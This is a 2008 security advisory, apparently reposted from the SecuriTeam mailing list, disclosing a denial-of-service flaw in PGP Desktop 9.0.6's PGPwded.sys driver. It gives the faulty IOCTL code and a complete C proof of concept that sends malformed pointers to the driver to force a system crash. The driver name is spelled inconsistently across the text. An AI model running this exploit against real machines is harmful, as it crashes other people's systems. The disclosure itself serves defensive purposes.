Search This Blog

Tuesday, December 23, 2008

[NT] PGP Desktop PGPwded.sys Denial of Service

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

PGP Desktop PGPwded.sys Denial of Service
------------------------------------------------------------------------


SUMMARY

PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input
(IOCTL) and this lead to a Driver Collapse that propagates on the system
with a BSOD.

DETAILS

Vulnerable Systems:
* PGP Desktop version 9.0.6

The affected PHPwded.sys IOCTL is 0x80022038:
+-------------------------------------------------+
Device Type: Custom Device Type: 0x8002, 32770
Transfer Type: METHOD_BUFFERED (0x0, 0)
Access Type: FILE_ANY_ACCESS (0x0, 0)
Function Code: 0x80E, 2062
+-------------------------------------------------+

Exploit:
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
*
* Author: Giuseppe 'Evilcry' Bonfa'
* E-Mail: evilcry {AT} gmail. {DOT} com
* Website: http://evilcry.netsons.org
*
*/

/*
Since we had publishing problems, we used spaces between escape < char and
the include file as shown here: #include < windows.h >, to compile you
have to delete the space.

*/
#include < windows.h >
#include < stdio.h >
#include < stdlib.h >

int main(void)
{
HANDLE hDevice;
DWORD Dummy;

system("cls");
printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");

hDevice = CreateFileA("\\\\.\\PGPwdef",
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);

if (hDevice == INVALID_HANDLE_VALUE)
{
printf("\n Unable to Open PGPwded Device Driver\n");
return EXIT_FAILURE;
}

DeviceIoControl(hDevice, 0x80022038,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);

return EXIT_SUCCESS;
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:contact.fingers@gmail.com>
evil fingers.
The original article can be found at:
<http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.pdf> http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.pdf

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments: